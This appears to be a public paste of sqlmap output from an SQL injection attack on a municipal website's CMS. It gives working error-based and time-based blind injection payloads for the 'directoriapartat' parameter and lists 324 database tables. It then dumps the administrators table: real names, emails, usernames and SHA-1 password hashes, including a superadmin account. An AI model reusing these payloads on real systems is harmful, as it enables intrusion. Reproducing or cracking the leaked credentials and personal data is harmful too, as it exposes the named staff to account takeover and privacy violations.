- Identified the following injection points with a total of 180 HTTP(s) requests:
- ---
- Place: GET
- Parameter: directoriapartat
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: apartat=&directoriapartat=1 AND (SELECT 6265 FROM(SELECT COUNT(*),CONCAT(0x3a7666683a,(SELECT (CASE WHEN (6265=6265) THEN 1 ELSE 0 END)),0x3a7164613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: apartat=&directoriapartat=1 AND SLEEP(5)
- ---
- available databases [2]:
- [*] elpapiol
- [*] information_schema
- Identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: directoriapartat
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: apartat=&directoriapartat=1 AND (SELECT 6265 FROM(SELECT COUNT(*),CONCAT(0x3a7666683a,(SELECT (CASE WHEN (6265=6265) THEN 1 ELSE 0 END)),0x3a7164613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: apartat=&directoriapartat=1 AND SLEEP(5)
- ---
- Database: elpapiol
- [324 tables]
- +--------------------------------------+
- | actes |
- | actesstats |
- | actestipus |
- | agenda |
- | agenda_subscripcions |
- | agendacategories |
- | agendahoraris |
- | agendaimatges |
- | agendarecursos |
- | agendarelaciocategories |
- | agendarelaciodirectoris |
- | agendarelacioseccions |
- | agendastats |
- | aliesdomini |
- | apartats |
- | apartatsimatges |
- | apartatsplantilles |
- | apartatspresentacio |
- | apartatsrecursos |
- | apartatsrelacioseccions |
- | apartatsstats |
- | ar |
- | aragenda |
- | aragendahoraris |
- | aragendastats |
- | arapartats |
- | arapartatsimatges |
- | arapartatspresentacio |
- | arapartatsrecursos |
- | arapartatsstats |
- | ararxiuimatges |
- | arforumdocs |
- | arforummissatges |
- | armillores |
- | arrecursos |
- | arrecursosstats |
- | arrelacioseccions |
- | arusuaris |
- | arusuarislogs |
- | arxiuimatges |
- | arxiuimatgescategories |
- | arxiuimatgesenviades |
- | arxiuimatgesrelaciocategories |
- | avisos |
- | bancespais |
- | banners |
- | bannersrelacioseccions |
- | bannersstats |
- | blocs |
- | campanyes |
- | campanyescategories |
- | campanyesconfiguracio |
- | campanyesimatges |
- | campanyesrecursos |
- | campanyesrelaciocategories |
- | campanyesrelaciodirectori |
- | campanyesrelaciodirectoris |
- | campanyesrelacioseccions |
- | campanyesrelacioserveis |
- | campanyesrelaciotramits |
- | campanyesstats |
- | camps |
- | cataleg |
- | catalegcategories |
- | catalegconfiguracio |
- | catalegcronologic |
- | catalegimatges |
- | catalegrecursos |
- | catalegrelaciocategories |
- | catalegrelaciocronologic |
- | catalegrelaciodirectori |
- | catalegrelaciodirectoris |
- | catalegrelacioseccions |
- | catalegrelaciotipus |
- | catalegrelaciotramits |
- | catalegstats |
- | catalegtipus |
- | concursos |
- | concursosconfiguracio |
- | concursosrecursos |
- | concursosrelacioseccions |
- | concursosstats |
- | contractaciopublica |
- | contractaciopublicacategories |
- | contractaciopublicarecursos |
- | contractaciopublicarelaciocategories |
- | contractaciopublicarelaciodirectoris |
- | contractaciopublicarelacioseccions |
- | contractaciopublicastats |
- | control |
- | convocatories |
- | convocatoriesconfiguracio |
- | convocatoriespremsa |
- | convocatoriespremsaimatges |
- | convocatoriespremsarecursos |
- | convocatoriespremsarelacioseccions |
- | convocatoriespremsastats |
- | convocatoriesrecursos |
- | convocatoriesrelacioseccions |
- | convocatoriesstats |
- | cron |
- | cursos |
- | cursoscategories |
- | cursosperfils |
- | cursosrecursos |
- | cursosrelaciosubcategories |
- | cursosstats |
- | cursossubcategories |
- | directori |
- | directoriapartats |
- | directoricategories |
- | directoriimatges |
- | directorimodul |
- | directorirecursos |
- | directorirelacioapartats |
- | directorirelaciodirectoris |
- | directorirelacioseccions |
- | directorispresentacio |
- | directoristats |
- | dominis |
- | dossiers |
- | dossiersimatges |
- | dossiersmoduls |
- | dossierspagines |
- | dossierspaginesrelacioseccions |
- | dossierspaginesstats |
- | dossiersplantilles |
- | dossiersplantillescontigut |
- | dossiersplantillespagines |
- | dossierspresentacio |
- | dossiersrelacioseccions |
- | edats |
- | enquestes |
- | enquestespreguntes |
- | enquestesrelacioseccions |
- | enquestesresultats |
- | enquestesstats |
- | entitats |
- | estudis |
- | forms |
- | formscamps |
- | formsgrups |
- | formsregistre |
- | formsresults |
- | formsstats |
- | forummissatges |
- | forums |
- | forumsrelacioseccions |
- | gestiodominiparametresfrontal |
- | gestioparametresfrontal |
- | gestioseccionsfrontal |
- | gestors |
- | gestorsgrups |
- | gestorspermisos |
- | guies |
- | guiesconceptes |
- | guiesconceptesstats |
- | guiesprojectes |
- | guiesprojectescategories |
- | guiesprojectesstats |
- | guiesrespostes |
- | guiesrespostesstats |
- | lagenda |
- | lagendacategories |
- | llibrevisites |
- | llibrevisitesconfiguracio |
- | llibrevisitesparametres |
- | logextranet |
- | loggestors |
- | logparticipacio |
- | logs |
- | logsextranet |
- | logsusuaris |
- | logusuaris |
- | millores |
- | mitjanscomunicacio |
- | mitjanscomunicacioambits |
- | municipis |
- | notespremsa |
- | notespremsaimatges |
- | notespremsarecursos |
- | notespremsarelacioseccions |
- | notespremsastats |
- | noticies |
- | noticies_subscripcions |
- | noticiescategories |
- | noticiesimatges |
- | noticiesrecursos |
- | noticiesrelaciocategories |
- | noticiesrelaciodirectoris |
- | noticiesrelacioseccions |
- | noticiesstats |
- | ordenances |
- | ordenancesarticles |
- | ordenancescapitols |
- | ordenancesseccions |
- | ordenancesstats |
- | ordenancestipus |
- | participaciomissatges |
- | participacioparticipants |
- | participaciosectors |
- | participaciotemes |
- | perfildominis |
- | peus |
- | peusstats |
- | plantillesbutlletins |
- | plantillesbutlletinsmoduls |
- | plantillescontingut |
- | plantillescontingutmoduls |
- | portada |
- | portalentitats |
- | portalentitatsforumforums |
- | portalentitatsforummissatges |
- | portalentitatslog |
- | portalentitatsnoticies |
- | portalentitatsnoticiesimatges |
- | portalentitatspresentacio |
- | portalentitatssolicitudsparticipacio |
- | productes |
- | productescaracteristiques |
- | productescategories |
- | productesrelaciocaracteristiques |
- | productesrelaciocategories |
- | productestipus |
- | productestipusconfiguracio |
- | programes |
- | programesambits |
- | programesdirectori |
- | programesinstitucions |
- | programesprojectes |
- | programesprojectesstats |
- | programesrelacioseccions |
- | questionaris |
- | questionarispreguntes |
- | questionarisrelacioseccions |
- | questionarisresultats |
- | questionarisstats |
- | radiograella |
- | radiograellaprogrames |
- | radioprogrames |
- | radioprogramescategories |
- | radioprogramesstats |
- | radiotvpodcast |
- | radiotvpodcaststats |
- | radiotvprogrames |
- | radiotvprogramescategories |
- | radiotvprogrameshoraris |
- | radiotvprogramesimatges |
- | radiotvprogramesrecursos |
- | radiotvprogramesrelacioseccions |
- | radiotvprogramesstats |
- | rebutjatcomentaris |
- | recullpremsa |
- | recullpremsarecursos |
- | recullpremsarelacioseccions |
- | recullpremsastats |
- | recursos |
- | recursoscategories |
- | recursosextensions |
- | recursosrelaciocategories |
- | recursosstats |
- | rss |
- | rsslectors |
- | rsssubscripcions |
- | rssusuaricaixes |
- | seccions |
- | serveis |
- | serveiscategories |
- | serveisconfiguracio |
- | serveisimatges |
- | serveisrecursos |
- | serveisrelaciocategories |
- | serveisrelaciodirectori |
- | serveisrelaciodirectoris |
- | serveisrelacioseccions |
- | serveisrelaciotramits |
- | serveisstats |
- | sms |
- | smsconfiguracio |
- | smsenviaments |
- | smsproces |
- | smssubscripcionsmoduls |
- | statsbotsexclosos |
- | statsipsexcloses |
- | statsresolucions |
- | statsvisites |
- | subscripcions |
- | subscripcionsbutlletins |
- | subscripcionsbutlletinsmoduls |
- | subscripcionsbutlletinsseleccio |
- | subscripcionsenviaments |
- | subscripcionsproces |
- | subscripcionssubscrits |
- | subscripcionstextos |
- | subscrits |
- | subscritssms |
- | tauler |
- | tauleranuncis |
- | tauleranuncis_subscripcions |
- | tauleranunciscategories |
- | tauleranuncisrecursos |
- | tauleranuncisrelaciocategories |
- | tauleranuncisrelaciodirectoris |
- | tauleranuncisrelacioseccions |
- | tauleranuncisstats |
- | textos |
- | tramits |
- | tramitscategories |
- | tramitsconfiguracio |
- | tramitsperfils |
- | tramitsrecursos |
- | tramitsrelaciocategories |
- | tramitsrelaciodirectori |
- | tramitsrelaciodirectoris |
- | tramitsrelacioseccions |
- | tramitsstats |
- | usuaris |
- | valors |
- | websinteres |
- | websinterescategories |
- | websinteresrelaciocategories |
- | websinteresrelacioseccions |
- | websinteresstats |
- | wlansubscrits |
- +--------------------------------------+
- Identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: directoriapartat
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: apartat=&directoriapartat=1 AND (SELECT 6265 FROM(SELECT COUNT(*),CONCAT(0x3a7666683a,(SELECT (CASE WHEN (6265=6265) THEN 1 ELSE 0 END)),0x3a7164613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: apartat=&directoriapartat=1 AND SLEEP(5)
- ---
- Database: elpapiol
- Table: gestors
- [11 columns]
- +-----------------+---------------------+
- | Column | Type |
- +-----------------+---------------------+
- | bloquejat | tinyint(1) unsigned |
- | canviarpassword | tinyint(1) unsigned |
- | codi | int(10) unsigned |
- | dominis | text |
- | DUM | timestamp |
- | email | varchar(100) |
- | entitat | int(10) unsigned |
- | nom | varchar(100) |
- | password | varchar(100) |
- | tipus | enum('C','A','3') |
- | usuari | varchar(16) |
- +-----------------+---------------------+
- Identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: directoriapartat
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: apartat=&directoriapartat=1 AND (SELECT 6265 FROM(SELECT COUNT(*),CONCAT(0x3a7666683a,(SELECT (CASE WHEN (6265=6265) THEN 1 ELSE 0 END)),0x3a7164613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: apartat=&directoriapartat=1 AND SLEEP(5)
- ---
- Database: elpapiol
- Table: gestors
- [30 entries]
- +-----------------------------------+------------------------------------+
- | email | nom |
- +-----------------------------------+------------------------------------+
- | criadopa@diba.cat | Alicia Criado |
- | criadopa@diba.cat | Alicia Criado |
- | jaume@badrenas.com | Badrenas Buscart, Jaume |
- | cabestanyns@elpapiol.cat | Cabestany Negredo, Sara |
- | isp@creacom.es | Creacom |
- | NULL | Diputaci\xf3 de Barcelona |
- | NULL | Diputaci\xf3 de Barcelona |
- | gestio@emfasic.om | \xc8mfasi Comunicaci\xf3 (cron) |
- | emm.mpongiluppi@elpapiol.cat | Faura Salvador, Montserrat |
- | floresct@elpapiol.cat | Flores Campodarbe, Tom\xe0s |
- | gironcb@diba.cat | Gir\xf3n Camacho, Balbina |
- | gonzalezcar@elpapiol.cat | Gonzalez Cloquell, arnau |
- | guardiast@elpapiol.cat | Guardia Sanchez, Tanit |
- | pousaj@diba.cat | Josep Pous Alo |
- | mediambient.elpapiol@elpapiol.cat | Judit Solana Pons |
- | esports.elpapiol@diba.cat | Labella Lorite, Jose |
- | landajopm@elpapiol.cat | Landajo Porta, M\xf2nica |
- | lopezgm | Lopez Gerez, M del Mar |
- | majoaa@diba.cat | Maj\xf3 i Amig\xf3, Antoni |
- | boschrm@diba.cat | Margarida Bosch |
- | boschrm@diba.cat | Margarida Bosch (administraci\xf3) |
- | NULL | Miquel |
- | comunicacio.papiol@diba.cat | Oriol Costa |
- | alujasmo@diba.cat | Oscar Alujas |
- | paloucl@diba.cat | Palou Catas\xfas, laura |
- | elpapiol@cpnl.cat | Sanchez Roig, Ester |
- | NULL | Superadministrador |
- | torrasbm@diba.cat | Torras Bozzo, Marc |
- | iriarteaa@diba.cat | Ver\xf2nica Iriarte Almada |
- | viveshp@elpapiol.cat | Vives Herrera, Pere |
- +-----------------------------------+------------------------------------+
- Identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: directoriapartat
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: apartat=&directoriapartat=1 AND (SELECT 6265 FROM(SELECT COUNT(*),CONCAT(0x3a7666683a,(SELECT (CASE WHEN (6265=6265) THEN 1 ELSE 0 END)),0x3a7164613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: apartat=&directoriapartat=1 AND SLEEP(5)
- ---
- Database: elpapiol
- Table: gestors
- [30 entries]
- [+] Passwords encrypted in MySQL 160bit - SHA-1(SHA-1($pass))
- +-----------------+-------------------------------------------+---------------+
- | canviarpassword | password | usuari |
- +-----------------+-------------------------------------------+---------------+
- | 0 | *1A7BA4BCEFF63FBE9464718191313671F4A3410F | Miquel |
- | 0 | *EF1CA61551AE604E7F55F2EC32F2A59C9CAA747A | alujasmo |
- | 0 | *A0FE0489F17E78F4333CDD9BC326A8676086A817 | badrenasbj |
- | 0 | *5EDE5FEA30DD3405202CF10DACBE146F18019562 | boschrm |
- | 0 | *AFBA94031E012DAA67282342C2B41821844A9D8A | boschrmadmin |
- | 0 | *9296BEA51A3EB4BB13BF00E6BBB3B177476BF0DD | cabestanyns |
- | 0 | *D95AAD49D470F25693EB3FBD9E753D696FAEC510 | costako |
- | 0 | *FEB0E6A4EA42A11EA63EB9AF4C26DE71D7EC8C31 | creacom |
- | 0 | *6ECC2FF16E5333B79998D353FE965B972E6FE9E2 | criadopa |
- | 0 | *281790E077DB71A847F08F876E6FFC33DE5B7C4D | criadopaadmin |
- | 0 | *C794F309B5DBCAE7EE07EEB596DA5491BC125D11 | cront |
- | 0 | *117C833EA96D9B0BB0B14E2F416F3515B5BA5C68 | diba |
- | 0 | *C14B9D734275EF019B753BFD41ABB21A21DF49D1 | dibaadmin |
- | 0 | *ED5FB49F1AB68B43FC7846FDBA635CE988CA73D2 | faurasm |
- | 0 | *C4AEC76514A6BA4BD4AC56B4A7D1C831845773F2 | floresct |
- | 0 | *7B1DAEC6D3326385584705950037467A4463AD4C | gironcb |
- | 1 | *00F89096B936562285144793982D5D0F2DC96FD3 | gonzalezcar |
- | 1 | *B11FA3ACEC8A7ACAF28C8011715DD5795CD1F5DB | guardiast |
- | 1 | *8F20011BA5DA1B5506388A87ECB96229DE552502 | iriarteav |
- | 0 | *D606100493EE814BE1A4EBC10A7D71F5CF449751 | labellalj |
- | 0 | *C24705E63AF6F525F24FEA6133A179FA54E8F687 | landajopm |
- | 0 | *4796C3D264E49928A623C3B220AD5D5F3EB16B4F | lopezgm |
- | 0 | *BAA8C082A419D36E37090F38AF216D559F7A45E0 | majoaa |
- | 0 | *6AAE9E44EB14985318ABB02DCD8B8D35EBB0F68B | paloucl |
- | 0 | *30623C1C1A9D7A527F70716830B13A6E972E65F1 | pousaj |
- | 0 | *537C0414A657190815B1538215F4F5103877EA96 | sanchezre |
- | 0 | *5FAEE973F0097D65EF7F5CE4B7CB5D90A6D5AE78 | solanapj |
- | 0 | *3397B5AD8935AEBFF107768D8D1D016AB004D1E5 | superadmin |
- | 1 | *90CD78303B59ED609AB6CE7346CCC18764EAD0C1 | torrasbm |
- | 0 | *39704720D94984EBCE6072E529FA22715C17EE2C | viveshp |
- +-----------------+-------------------------------------------+---------------+
Don't like ads? PRO users don't see any ads ;-)
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
create a new version of this paste
RAW Paste Data